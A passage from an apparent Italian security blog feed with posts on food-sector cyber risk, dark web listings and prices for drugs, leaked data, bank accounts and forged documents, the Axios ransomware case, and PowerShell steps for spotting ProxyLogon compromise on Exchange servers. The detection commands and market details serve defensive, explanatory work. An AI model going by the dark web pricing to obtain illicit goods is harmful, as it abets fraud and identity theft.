&lt;p&gt;Il pagamento del riscatto, cifra che si aggira intorno agli &lt;strong&gt;11 milioni di dollari in Bitcoin&lt;/strong&gt;, è stato condannato duramente dal Congresso americano e dall’FBI con l’accusa che “qualsiasi pagamento al gruppo criminale avrebbe aumentato il rischio di futuri attacchi ransomware sul territorio”. Nonostante la multinazionale brasiliana impieghi ad oggi circa 850 tecnici worldwide con una spesa di 200 milioni di dollari per l’IT, gli &lt;strong&gt;investimenti in sicurezza informatica sono in proporzione esigui&lt;/strong&gt; e non focalizzati sulla protezione dell’infrastruttura e alle conseguenze di potenziali &lt;strong&gt;attacchi cyber nel settore alimentare&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybersecurity-food/food-cyber-security.jpg&#34; alt=&#34;cyber-security-food&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;il-foodtech-in-italia&#34;&gt;Il foodtech in Italia&lt;/h2&gt;

&lt;p&gt;L’applicazione della tecnologia al mondo alimentare, definito anche con il neologismo &lt;em&gt;foodtech&lt;/em&gt;, è diventato un requisito necessario per poter essere competitivi in un settore consolidato e globalizzato.&lt;/p&gt;

&lt;p&gt;L&amp;rsquo;automazione sta acquisendo un ruolo crescente nel settore primario e secondario, soprattutto perché i produttori alimentari ricercano sempre più l’efficienza della produzione per soddisfare sia i margini ristretti di guadagno che la crescente domanda globale di cibo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybersecurity-food/foodtech-in-italia.JPG&#34; alt=&#34;foodtech-in-italia&#34; /&gt;&lt;/p&gt;

&lt;p&gt;In particolare, in Italia si assiste ad un processo di &lt;strong&gt;trasformazione digitale nel settore&lt;/strong&gt; che sta avvenendo grazie ad aziende che investono per efficientare tutta la filiera con soluzioni innovative.
Il panorama è vario e non omogeneo e le varie adozioni tecnologiche si differenziano a seconda dei fabbisogni di ciascuna azienda e dalle fasi della filiera. Possiamo però identificare &lt;strong&gt;tre aree&lt;/strong&gt; dove la tecnologia crea un beneficio concreto alle aziende:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Nella &lt;strong&gt;produzione&lt;/strong&gt;: pensiamo ad esempio un braccio robotizzato, la tecnologia permette di avere un ritorno maggiore sulla qualità finale del prodotto mentre la sensoristica IoT, di soddisfare i controlli qualità sempre più stringenti nel mondo del food.&lt;/li&gt;
&lt;li&gt;Nello &lt;strong&gt;stoccaggio delle materie prime e dei prodotti finiti&lt;/strong&gt;: si aumenta la capacità di gestione delle scorte e l’efficienza del trasporto.&lt;/li&gt;
&lt;li&gt;Nella &lt;strong&gt;tracciabilità dei prodotti&lt;/strong&gt;: secondo Osservatori Digital Innovation nel 2019 in Italia le tecnologie maggiormente utilizzate sono la blockchain (43%), seguita dai QR code (41%), dal app mobile (36%), l’IoT (30%) e il cloud (27%).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybersecurity-food/food-tech.JPG&#34; alt=&#34;foodtech-data&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;rischi-cyber-per-il-settore-alimentare&#34;&gt;Rischi Cyber per il settore alimentare&lt;/h2&gt;

&lt;p&gt;Tutta questa connettività è, però, potenzialmente vulnerabile.
Basti pensare che la &lt;em&gt;botnet Mirai&lt;/em&gt;, una delle più grandi reti criminali utilizzate per attacchi &lt;em&gt;DDoS&lt;/em&gt;, ricerca continuamente indirizzi IP di dispositivi IoT vulnerabili ed esposti di diverse aziende per ampliare la propria efficacia d’attacco.&lt;/p&gt;

&lt;p&gt;Le conseguenze di un attacco cyber nel settore alimentare possono risultare molto impattanti sulla &lt;strong&gt;continuità del business e della filiera&lt;/strong&gt;.
Un esempio recente riguarda circa 800 supermercati svedese della catena Coop, i quali sono stati costretti a chiudere a causa dell’&lt;a href=&#34;https://cybergon.com/blog/posts/attacchi-alla-supply-chain-il-caso-kaseya/&#34;&gt;attacco informatico a Kaseya&lt;/a&gt;: le casse dei negozi, gestite con il software VSA, hanno risentito della vulnerabilità zero-day (CVE-2021-30116) e del conseguente attacco che ha permesso ai cyber criminali di distribuire un ransomware sulla loro infrastruttura IT. La catena ha invitato i consumatori a ritirare la merce deperibile per evitare lo spreco alimentare causando una forte perdita per la reddittività dei diversi punti vendita.&lt;/p&gt;

&lt;p&gt;Per riassumere, tra i rischi principali correlati a questo specifico settore vi sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;La paralisi della produzione&lt;/strong&gt; causata da ransomware con &lt;strong&gt;conseguente aumento dei prezzi dei generi alimentari&lt;/strong&gt; (es. il prezzo al chilo della carne triplicato dopo l’attacco a JBS) e difficoltà o mancata consegna di prodotti ai distributori finali.
Un altro esempio recente avvenuto in Olanda riguarda un’azienda di food logistic produttrice e distributrice di formaggio pre-confezionato che il 27 aprile 2021 ha subito un attacco ransomware a causa di una vulnerabilità di Microsoft Exchange causando una &lt;strong&gt;carenza di prodotto a livello nazionale&lt;/strong&gt; nella grande distribuzione organizzata. In particolare, anche le aziende di logistica che lavorano nella catena del freddo si rivelano essere &lt;strong&gt;target estremamente sensibili&lt;/strong&gt;: la necessità di conservazione a basse temperature le rende facilmente ricattabili, in quanto un blocco dei sistemi comprometterebbe irrimediabilmente la composizione dei prodotti alimentari.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybersecurity-food/food-olanda.jpg&#34; alt=&#34;food-olanda-lack&#34; /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;La contaminazione degli alimenti&lt;/strong&gt;: grazie a un attacco in remoto si possono &lt;strong&gt;alterare i parametri&lt;/strong&gt; e modificare in modo impercettibile i movimenti di un braccio meccanico. Un gruppo di ricercatori italiani con sede a Torino ha dimostrato quanto possa risultare facile &lt;strong&gt;l’hackeraggio dei macchinari utilizzati&lt;/strong&gt; per tagliare, miscelare o confezionare alimenti, danneggiando la produzione e costringendo una casa produttrice, nel caso peggiore, ad un ritiro della merce dalla grande distribuzione. Il danno di immagine che ne deriverebbe non è di certo indifferente per un’azienda del food, che basa il ritorno economico sulla fiducia del consumatore.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Esfiltrazione dei dati&lt;/strong&gt;: diverse tipologie di dati posso essere esfiltrati e pubblicati online rivelando &lt;strong&gt;proprietà intellettuale, processi interni e informazioni sensibili&lt;/strong&gt; del personale, fornitori e clienti. È accaduto nel 2019 a un’azienda produttrice di salumi made in Italy. Il ransomware Maze della famosa ex-ATP russa è riuscito ad esfiltrare e pubblicare online &lt;strong&gt;400 Mb di dati&lt;/strong&gt; (e qualche ora dopo la stessa sorte è toccata al famoso birrificio belga Bush)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cybersecurity-food/food-data-exfiltration.png&#34; alt=&#34;food-olanda-lack&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Si tratta di un caso sul nostro territorio che mette in luce le &lt;strong&gt;vulnerabilità del sistema alimentare&lt;/strong&gt; contro le minacce digitali: i potenziali punti di ingresso per un attaccante sono molteplici ma spesso quello più delicato è il primo miglio, in cui si è più sensibili ai costi marginali e alle esportazioni che alla sicurezza della produzione.
Le imprese dovrebbero sempre tenere presente che si tratta di una guerra su due fronti, avendo da un lato attacchi diretti alla propria infrastruttura e dall&amp;rsquo;altro attacchi indiretti contro aziende terze che si occupano di approvvigionamento delle materie prime e distribuzione.&lt;/p&gt;

&lt;h2 id=&#34;un-oceano-blu-per-il-cybercrime&#34;&gt;Un oceano blu per il cybercrime&lt;/h2&gt;

&lt;p&gt;La filiera alimentare in Italia rappresenta il &lt;strong&gt;15% del PIL nazionale&lt;/strong&gt; con una cifra che si aggira ai 522 miliardi di euro ed è composta da 70.934 aziende tra piccoli-medi produttori e brand riconosciuti che esportano in tutto il mondo per un valore di 43,5 miliardi di euro. (Fonte: Annuario dell&amp;rsquo;agricoltura italiana 2019-2020)&lt;/p&gt;

&lt;p&gt;Negli ultimi anni si è generato un gap tecnologico tra i piccoli-medi produttori e le grandi multinazionali: quest’ultime si sono potute strutturate internamente &lt;strong&gt;difendendo la propria proprietà intellettuale&lt;/strong&gt; che necessita di una protezione ulteriore contro lo spionaggio industriale, mentre molte delle piccole-medie aziende del settore si basano ancora su &lt;strong&gt;sistemi operativi e software obsoleti&lt;/strong&gt; non aggiornabili poiché in end-of-life.&lt;/p&gt;

&lt;p&gt;Il fatto che ad oggi siano stati registrati diversi attacchi ransomware di rilievo, ad esempio a uno dei leader mondiali del beverage italiano e a una famosa multinazionale francese dell&amp;rsquo;industria lattiero-casearia, ci ricorda che nessuna azienda, sia per dimensione che per posizionamento, è &lt;strong&gt;immune dall’industria del cybercrime&lt;/strong&gt; che sistematicamente estorce valuta digitale da vittime non preparate a rispondere ad attacchi informatici.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Ai confini della rete: viaggio tra i prodotti in vendita nel dark web</title>
         <link>https://blog.cybergon.com/posts/ai-confini-della-rete-viaggio-nel-dark-web/</link>
         <pubDate>Wed, 16 Jun 2021 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Fabio Crestani</author>
         
               
             <author>Simone Errico</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/ai-confini-della-rete-viaggio-nel-dark-web/</guid>
         <description>

&lt;p&gt;Nel multiverso della rete esiste un luogo, una terra non emersa ma non così difficilmente raggiungibile, in cui è possibile acquistare letteralmente qualsiasi cosa.
Nel Dark Web l’utente vive la propria customer journey e attraversa ogni fase: dall’esplorazione dei prodotti, alla scelta, alla recensione del venditore, proprio come succede sui marketplace.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/indagine-dark-web/hackers-mask.jpg&#34; alt=&#34;dark-web&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;surface-web-deep-web-dark-web&#34;&gt;Surface Web, Deep Web, Dark Web&lt;/h2&gt;

&lt;p&gt;Il cosiddetto Internet visibile (Surface Web, o Open Web), ovvero i siti che possono essere trovati attraverso motori di ricerca come Google, rappresentano solo la parte emersa di un pianeta nel cui nucleo si nascondono &lt;strong&gt;Deep Web&lt;/strong&gt; e &lt;strong&gt;Dark Web&lt;/strong&gt;.
Il Deep Web rappresenta all&amp;rsquo;incirca il 90% di tutti i siti web; questa rete è talmente ampia che risulta impossibile scoprire esattamente quante pagine siano attive contemporaneamente. Il Deep Web include a sua volta &lt;strong&gt;una porzione di rete&lt;/strong&gt; nota come Dark Web, che fa riferimento a siti non indicizzati e accessibili esclusivamente con browser specifici.&lt;/p&gt;

&lt;p&gt;Il Dark Web viene utilizzato come &lt;strong&gt;luogo di scambio&lt;/strong&gt; in cui è possibile acquistare merci, servizi o dati illeciti.
Truffe, furto di dati bancari, diffusione non autorizzata di dati personali e compravendita di documenti falsificati, droghe e farmaci è solo una parte di ciò che c’è disponibile. Migliaia di cybercriminali sono pronti ad incassare denaro attraverso criptovalute, così comuni per la mancanza di intermediazione bancaria e per la possibilità di sfruttare la tecnica del &lt;em&gt;mixing&lt;/em&gt;, che consiste nell’effettuare transazioni tra più &lt;em&gt;wallet&lt;/em&gt; per depistare eventuali indagini.
All’arcinoto Bitcoin si affiancano altri mezzi di pagamento ampiamente accettati e diffusi come Monero, Litecoin o Bitcoin cash.&lt;/p&gt;

&lt;h3 id=&#34;vaccini-e-sostanze-stupefacenti&#34;&gt;Vaccini e sostanze stupefacenti&lt;/h3&gt;

&lt;p&gt;Con lo scoppio della pandemia, il &lt;strong&gt;settore pharma&lt;/strong&gt; ha incrementato notevolmente le interazioni tra venditori e compratori di queste categorie di prodotti. Alcune piattaforme mettono a disposizione le dosi di vaccino Covid-19 di diverse case farmaceutiche, tra cui Pfizer-Biontech e Sputnik.
Nello specifico, &lt;strong&gt;800 fiale di Pfizer-Biontech&lt;/strong&gt; vengono vendute a 19.000 euro (in sconto da 34.000) e &lt;strong&gt;1000 dosi di Sputnik&lt;/strong&gt; a 6.500 euro (in sconto da 8.000).&lt;/p&gt;

&lt;p&gt;Insieme ai vaccini vengono spedite le istruzioni dettagliate per l’inoculazione, i componenti, i contenuti dei trial clinici e il bugiardino con gli effetti indesiderati.
I venditori sono recensiti con &lt;strong&gt;average score molto alti&lt;/strong&gt; (“excellent” e “very good”), forse anche per via della loro disponibilità: non è difficile contattarli via mail, WhatsApp o Telegram.&lt;/p&gt;

&lt;p&gt;Nel capitolo &lt;em&gt;pharma&lt;/em&gt; non può mancare un riferimento ai due &lt;strong&gt;top seller&lt;/strong&gt; in questo campo: sostanze stupefacenti (cocaina, metanfetamina, hashish&amp;hellip;) e farmaci (popolari le benzodiazepine) per cifre che vanno da 6 a 100 dollari, fino a più di 3.000 al variare del prodotto.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/indagine-dark-web/dark-web-vaccini.png&#34; alt=&#34;dark-web-vaccini&#34; /&gt;&lt;/p&gt;

&lt;h3 id=&#34;data-breach-e-data-leak&#34;&gt;Data Breach e Data Leak&lt;/h3&gt;

&lt;p&gt;Ovvie &lt;strong&gt;le collection di dati trafugati&lt;/strong&gt; da siti web e piattaforme online.
Tra i data breach proposti dai venditori considerati affidabili (con una valutazione dal 90% al 100%), quelli più ricorrenti fanno riferimento a piattaforme &lt;strong&gt;e-commerce del settore fashion&lt;/strong&gt;, &lt;strong&gt;a servizi travel/hotel&lt;/strong&gt;, &lt;strong&gt;healthcare/sportivi&lt;/strong&gt; e a &lt;strong&gt;piattaforme social network&lt;/strong&gt;, oltre banche dati miste, per lo più provenienti dagli USA.&lt;/p&gt;

&lt;p&gt;I costi di acquisto dei &lt;em&gt;dump&lt;/em&gt; variano da 24 a 300 dollari a seconda della qualità e della quantità di dati: dal noto e gigantesco &lt;strong&gt;data leak di Facebook&lt;/strong&gt; in cui sono presenti 533 milioni di records (i dati pubblicati appartengono a 533.312.128 utenti Facebook divisi per Nazione e contengono informazioni quali il numero di telefono, l’ID Facebook, il genere, l&amp;rsquo;indirizzo di residenza, la data di nascita e l’indirizzo email) fino a un database composto da &lt;strong&gt;5 collection miste diverse per un totale di quasi 2,7 miliardi&lt;/strong&gt; di records composti da combinazioni di email e password.&lt;/p&gt;

&lt;p&gt;Interessante notare, nel caso del database Facebook, l’avvertimento da parte del venditore: “attenzione ai finti database composti da finte email e finti numeri di telefono”.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/indagine-dark-web/dark-web-facebook.png&#34; alt=&#34;dark-web-facebook&#34; /&gt;&lt;/p&gt;

&lt;h3 id=&#34;dati-bancari&#34;&gt;Dati bancari&lt;/h3&gt;

&lt;p&gt;Parlando di raccolte di dati finanziari, anche paesi Europei come Germania, Polonia e Liechtenstein non mancano. I prezzi variano di molto passando dalle decine di dollari relativi ai data breach ad un prezzo di vendita di 1.000 o 2.000€ per ogni gruppo di dati bancari.
Anche in questi casi i venditori sono recensiti con average score oltre il 90%. Il costo è giustificato dalla &lt;strong&gt;massima qualità dei database&lt;/strong&gt;: ognuno include infatti numeri di carte di debito, sim card, id card o ancora account di online banking con password e pin.&lt;/p&gt;

&lt;p&gt;Ad esempio, sono presenti collection di &lt;strong&gt;account bancari europei&lt;/strong&gt; declinati sia come “personal”, sia come “business”, vendute tra 1.500 e 1.900 Euro.&lt;/p&gt;

&lt;p&gt;Questi database contengono le informazioni necessarie a effettuare transazioni, anche fisiche (credit/debit card e relativi pin): per gli &lt;strong&gt;account business&lt;/strong&gt;, il possessore dei dati può effettuare transazioni online senza limiti e può prelevare fino a 10.000€ al giorno presso i punti autorizzati. Per gli &lt;strong&gt;account personal&lt;/strong&gt; invece, 25.000 € al giorno è il limite dell’online banking e 10.000€ al giorno dei prelievi presso gli atm autorizzati.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/indagine-dark-web/dark-web-bank.png&#34; alt=&#34;dark-web-bank&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Tra i prodotti disponibili in questa categoria non mancano &lt;strong&gt;le carte di credito prepagate&lt;/strong&gt;, con un costo medio per carta di 150$, le cui disponibilità si aggirano intorno ai 2.000 o 3.000$, e &lt;strong&gt;soldi falsi&lt;/strong&gt;: 2.500 dollari falsi si possono acquistare al prezzo di 249$ (veri).&lt;/p&gt;

&lt;h3 id=&#34;documenti-d-identità&#34;&gt;Documenti d&amp;rsquo;identità&lt;/h3&gt;

&lt;p&gt;Infine, per circa 500$ è possibile acquistare &lt;strong&gt;documenti reali verificati&lt;/strong&gt;.
Per esempio, un passaporto italiano con 10 anni di validità costa 600$. Con 85$, invece, acquisti il &lt;strong&gt;servizio di costruzione di un passaporto fittizio&lt;/strong&gt;.
Se si possiedono competenze grafiche, ci si può “accontentare” di template riutilizzabili: con soli 10 dollari ottieni passaporti modificabili in software di grafica, una soluzione efficace per la costruzione di &lt;strong&gt;identità fittizie utilizzate nelle frodi online&lt;/strong&gt;, che non richiedono il documento fisico.
Anche la patente di guida è facilmente reperibile: una patente italiana fake costa circa 150€, circa la metà di una reale con validità di 10 anni che è acquistabile per circa 350€.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/indagine-dark-web/dark-web-identita.png&#34; alt=&#34;dark-web-identita&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il Dark Web era stato sviluppato inizialmente con lo scopo di mantenere le comunicazioni private, garantire la privacy tramite la navigazione anonima favorendo la libertà di parola.
Come tutte le innovazioni tecnologiche il suo utilizzo è ben presto cambiato &lt;strong&gt;favorendo una copertura naturale della criminalità&lt;/strong&gt; dalle agenzie governative anticrimine e diventando uno dei mercati neri più grandi al mondo.
Il Dark Web oggi rappresenta per noi uno strumento necessario a mentenere sotto costante monitoraggio trend, minacce e attacchi per sviluppare un efficace &lt;strong&gt;riconoscimento delle minacce&lt;/strong&gt;, e di conseguenza, un&amp;rsquo;adeguata strategia di risposta.
Questa fotografia rappresenta uno spaccato di un ambiente in cui la proposta è molto ampia, e spesso, ancor più pericolosa.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Quattro lezioni dal caso Axios</title>
         <link>https://blog.cybergon.com/posts/quattro-lezioni-dal-caso-axios/</link>
         <pubDate>Tue, 13 Apr 2021 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/quattro-lezioni-dal-caso-axios/</guid>
         <description>

&lt;p&gt;Durante la prima settimana di aprile, a pochi giorni dalla riapertura delle scuole, tutti i genitori, insegnanti e studenti delle nostre scuole si sono trovati di fronte all’indisponibilità del famoso “registro elettrico”, portale web fornito dall’azienda Axios.&lt;/p&gt;

&lt;p&gt;Il 3 Aprile alle 11:00, Axios ha pubblicato un primo comunicato sul proprio sito “a seguito di un improvviso malfunzionamento tecnico occorso durante la notte, si è reso necessario un intervento di manutenzione straordinaria.”
Il portale risultava quindi offline da diverse ore come era già accaduto durante altre precedenti occasioni.
Nelle ore e giorni successivi sono stati forniti ulteriori dettagli relativo all’accaduto e nella serata del 5 aprile Axios pubblica il &lt;a href=&#34;https://axiositalia.it/wp-content/uploads/2021/04/Comunicazione-databreach.pdf&#34;&gt;seguente comunicato&lt;/a&gt;: “a seguito delle approfondite verifiche tecniche messe in atto da Sabato mattina in parallelo con le attività di ripristino dei servizi, abbiamo avuto conferma che il disservizio creatosi è inequivocabilmente conseguenza di un attacco ransomware portato alla nostra infrastruttura.”&lt;/p&gt;

&lt;p&gt;A distanza di una settimana il servizio è tornato attivo provocando un grosso mal di testa per la società che eroga il servizio.
L’ultima comunicazione da parte della società riporta che “non risultano presenti rischi per i diritti e le libertà delle persone fisiche”, Axios ha infatti specificato che “i dati personali gestiti non sono stati persi/distrutti e non vi è stata alcuna visione/estrapolazione indebita.” Sarà così?&lt;/p&gt;

&lt;h2 id=&#34;l-anatomia-dell-attacco-ransomware&#34;&gt;L&amp;rsquo;anatomia dell&amp;rsquo;attacco ransomware&lt;/h2&gt;

&lt;p&gt;Un piano di risposta concordato e strutturato è fondamentale in un’organizzazione, perché permette di intervenire in caso di attacco. Ma per definire un piano di azione, bisogna fare un passo indietro ed analizzare l’anatomia dell’attacco. Anche se non si hanno dettagli sicuri sul malware che ha colpito Axios, possiamo analizzare un comune attacco ransomware.&lt;/p&gt;

&lt;p&gt;Il momento più eclatante, in cui il ransomware “chiede il riscatto”, è soltanto lo step finale di una catena di azioni che sono state eseguite precedentemente. Se si manifesta questa fase, possiamo affermare con certezza che le difese non hanno avuto effetto e nessuna attività di detect dei sintomi e comportamenti anomali durante le fasi precedenti hanno permesso di bloccare il completamento del processo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/caso-axios/anatomy-attack.JPG&#34; alt=&#34;anatomy-attack&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Se ripercorriamo tutti gli step, possiamo notare che le prime 3 azioni compiute all’interno dell’attacco hanno come obiettivo quello di ottenere privilegi sfruttando una vulnerabilità.&lt;/p&gt;

&lt;p&gt;Queste tre fase di identificazione e sfruttamento della vulnerabilità portano al nocciolo dell’attività: il deploy del malware, da cui inizia la Data Exfiltration (che ricordiamo, sembra non aver coinvolto Axios) e che si conclude con la crittografia dei dati sorgenti e la richiesta del riscatto. Il tempo totale di questo processo impiega mediamente 6 settimane, ma in molti casi raggiunge anche i 3 mesi.&lt;/p&gt;

&lt;p&gt;Dal momento iniziale, fino a quello finale (la famosa schermata con la richiesta in cryptovaluta), il comune denominatore da un punto di vista di comportamento della macchina è l’anomalia.
Spieghiamo meglio: come SOC, parte della nostra attività consiste nel monitoraggio continuo, sia del perimetro pubblico, che di quello aziendale.
Questo costante monitoraggio ci permette di identificare eventuali anomalie nel comportamento dei dispositivi in rete, e quindi analizzarle.
L’analisi dell’anomalia è fondamentale per intercettare una minaccia. Per utilizzare un sillogismo, tutti gli attacchi comportano un’anomalia, ma non tutte le anomalie rappresentano una minaccia.&lt;/p&gt;

&lt;p&gt;Questa attività è necessariamente eseguita da tecnologie e tool avanzati, che devono essere gestiti, controllati e arricchiti da team competenti (interni o esterni all’azienda) e con una particolare attenzione alla copertura oraria: Axios, ad esempio, ha dichiarato che il “malfunzionamento tecnico” è occorso durante la notte tra venerdì e sabato.&lt;/p&gt;

&lt;h3 id=&#34;quattro-lezioni-dal-caso-axios&#34;&gt;Quattro lezioni dal caso Axios&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Strutturare un processo di Incident Response ad hoc per attivare una risposta tempestiva ed efficace nel caso in cui l’attacco vada a buon fine&lt;/strong&gt;
Il governo delle difese aziendali deve passare anche dalla gestione dell’incidente e dei piani di emergenza in caso di attacchi gravi, che deve prevedere un intervento in modalità 24x7. Come vediamo, molti degli attacchi recenti avvengono di venerdì sera.
L’impatto dell’attacco informatico è direttamente proporzionale al tempo di risposta messo in campo.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Organizzare la difesa intorno al concetto di Data Loss Prevention&lt;/strong&gt;
Nel caso particolare di Axios è stato dichiarato che i dati presenti sui loro sistemi (tra cui i dati personali nostri e dei nostri figli) non risultano essere stati “rubati”, ma non esiste certezza durante questi attacchi che non ci sia stato tale furto. Un piano efficace deve prevedere questi passaggi: definire il dominio principale di protezione e identificare i tipi di dato che vengono scambiati e dove vengono memorizzati; Verificare di avere un piano di backup completo che tenga conto delle effettive esigenze con effettuando test di restore a intervalli regolari; rivedere, se presenti, i piani di business continuity, disaster recovery e le procedure per eventuali data breach.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Non sottovalutare le vulnerabilità&lt;/strong&gt;
Gli strumenti sopracitati evidenziano comportamenti anomali e con una buona strategia di difesa si può garantire una protezione del dato a diversi livelli. Tuttavia sarebbe utopistico affermare che i sistemi possano essere considerati sicuri. Il concetto di vulnerabilità e soprattutto di vulnerabilità 0-day è per sua natura in contrapposizione, ma avere politiche di patching dei software presenti in azienda può ridurre di molto il rischio di sfruttare vulnerabilità, che come visto, sono spesso i punti d’ingresso degli attaccanti.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Fare awareness sui dipendenti&lt;/strong&gt;
Lavorare sulla consapevolezza degli utenti con corsi di formazione ricorsivi e su tematiche quali l’ingegneria sociale, il phishing, l’uso consapevole delle piattaforme e la gestione delle password, solo per citarne alcune, contribuisce a creare una cultura della sicurezza in azienda e quindi innalzare scudi difensivi.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</description>
       </item>
       
       <item>
         <title>L&#39;attacco a Microsoft Exchange: come identificarlo</title>
         <link>https://blog.cybergon.com/posts/vulnerabilita-critica-microsoft-exchange-mitigation/</link>
         <pubDate>Wed, 10 Mar 2021 10:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
               
             <author>Davide Cabiola</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/vulnerabilita-critica-microsoft-exchange-mitigation/</guid>
         <description>

&lt;p&gt;Il 2 marzo sono state pubblicate &lt;strong&gt;quattro vulnerabilità Microsoft CRITICHE&lt;/strong&gt; (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 e CVE-2021-27065), legate a un &lt;strong&gt;exploit 0-day&lt;/strong&gt; di Microsoft Exchange Server.
Le vulnerabilità, se sfruttate “in catena”, permettono agli attaccanti di ottenere &lt;strong&gt;accessi illegittimi&lt;/strong&gt; a diversi server Exchange on-premise esposti su Internet.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/exchange/exchange-vulnerability.png&#34; alt=&#34;exchange-vulnerability&#34; /&gt;&lt;/p&gt;

&lt;p&gt;L&amp;rsquo;attacco può essere molto pericoloso a causa della semplicità di utilizzo di queste vulnerabilità.
Il &lt;a href=&#34;https://cybergon.com/blog/posts/advance-persistent-threat-i-nuovi-cyber-criminali/&#34;&gt;&lt;strong&gt;gruppo APT (Advanced Persistent Threat) HAFNIUM&lt;/strong&gt;&lt;/a&gt;, facente riferimento al territorio cinese sta effettuando attacchi su larga scala al di fuori del proprio territorio, principalmente negli Stati Uniti, ma ne è impattato anche il territorio italiano ed europeo.
L&amp;rsquo;indicizzazione &lt;em&gt;Shodan&lt;/em&gt; a cui i Threat Actors fanno riferimento, vedevano esposte più di &lt;strong&gt;266mila macchine&lt;/strong&gt; il giorno 4 marzo.
Oggi, dopo 6 giorni, il numero è sceso a 97mila.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/exchange/exchange-shodan.png&#34; alt=&#34;exchange-shodan&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Microsoft potrebbe aver appreso delle vulnerabilità attorno al 5 gennaio e impiegato quindi due mesi a rilasciare le patch correttive. Tempo che è stato proficuamente impiegato dagli attaccanti cinesi (ma potrebbero non essere i soli) per colpire oltre 250 mila aziende.&lt;/p&gt;

&lt;h2 id=&#34;le-azioni-di-mitigation-verifica-delle-compromissioni-e-patching&#34;&gt;Le azioni di mitigation: verifica delle compromissioni e patching&lt;/h2&gt;

&lt;p&gt;Microsoft ha creato &lt;a href=&#34;https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/&#34;&gt;un post&lt;/a&gt; con tutte le informazioni legate alle vulnerabilità ed è in continuo aggiornamento.&lt;/p&gt;

&lt;p&gt;Attualmente il funzionamento dell’attacco è ancora &lt;strong&gt;in fase di analisi&lt;/strong&gt;, ma suggeriamo fortemente di fare &lt;strong&gt;due azioni il prima possibile&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;A. &lt;strong&gt;VERIFICARE LA COMPROMISSIONE TRAMITE SCRIPT&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Di seguito la procedura per l&amp;rsquo;analisi:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;1. Collegarsi al DC e agli Exchange
2. Lanciare lo Script Test-ProxyLogon.ps1 di Microsoft recuperabile [da qui](https://github.com/microsoft/CSS-Exchange/tree/main/Security)
3. Verificare la presenza di file aspx sospetti nella cartella C:\inetpub\wwwroot\aspnet_client\ e sottocartelle
4. Effettuare i controlli seguenti tramite Powershell
5. Lanciare i seguenti comandi:

• [temp] Controllare il contenuto nella cartella temp di sistema tramite powershell alla ricerca di eventuali archivi/dump sospetti:

    Get-ChildItem C:\Windows\Temp -recurse -include *.rar | ConvertTo-Json
    Get-ChildItem C:\Windows\Temp -recurse -include *.zip | ConvertTo-Json

• [root] Controllare il contenuto mella cartella root di sistema tramite powershell alla ricerca di eventuali archivi/dump sospetti:

    Get-ChildItem C:\root -recurse -include *.rar | ConvertTo-Json
    Get-ChildItem C:\root -recurse -include *.zip | ConvertTo-Json

• [programdata] Controllare il contenuto nella cartella ProgramData di sistema tramite powershell  alla ricerca di eventuali archivi/dump sospetti: 

    Get-ChildItem C:\ProgramData -recurse -include *.rar | ConvertTo-Json
    Get-ChildItem C:\ProgramData -recurse -include *.zip | ConvertTo-Json

• [tasks] Controllare gli scheduled tasks presenti sulla macchina tramite powershell alla ricerca di scheduled task sospetti:

    Get-ScheduledTask | ForEach-Object {
    [pscustomobject]@{
    Name = $_.TaskName
    Path = $_.TaskPath
    LastResult = $(($_ | Get-ScheduledTaskInfo).LastTaskResult)
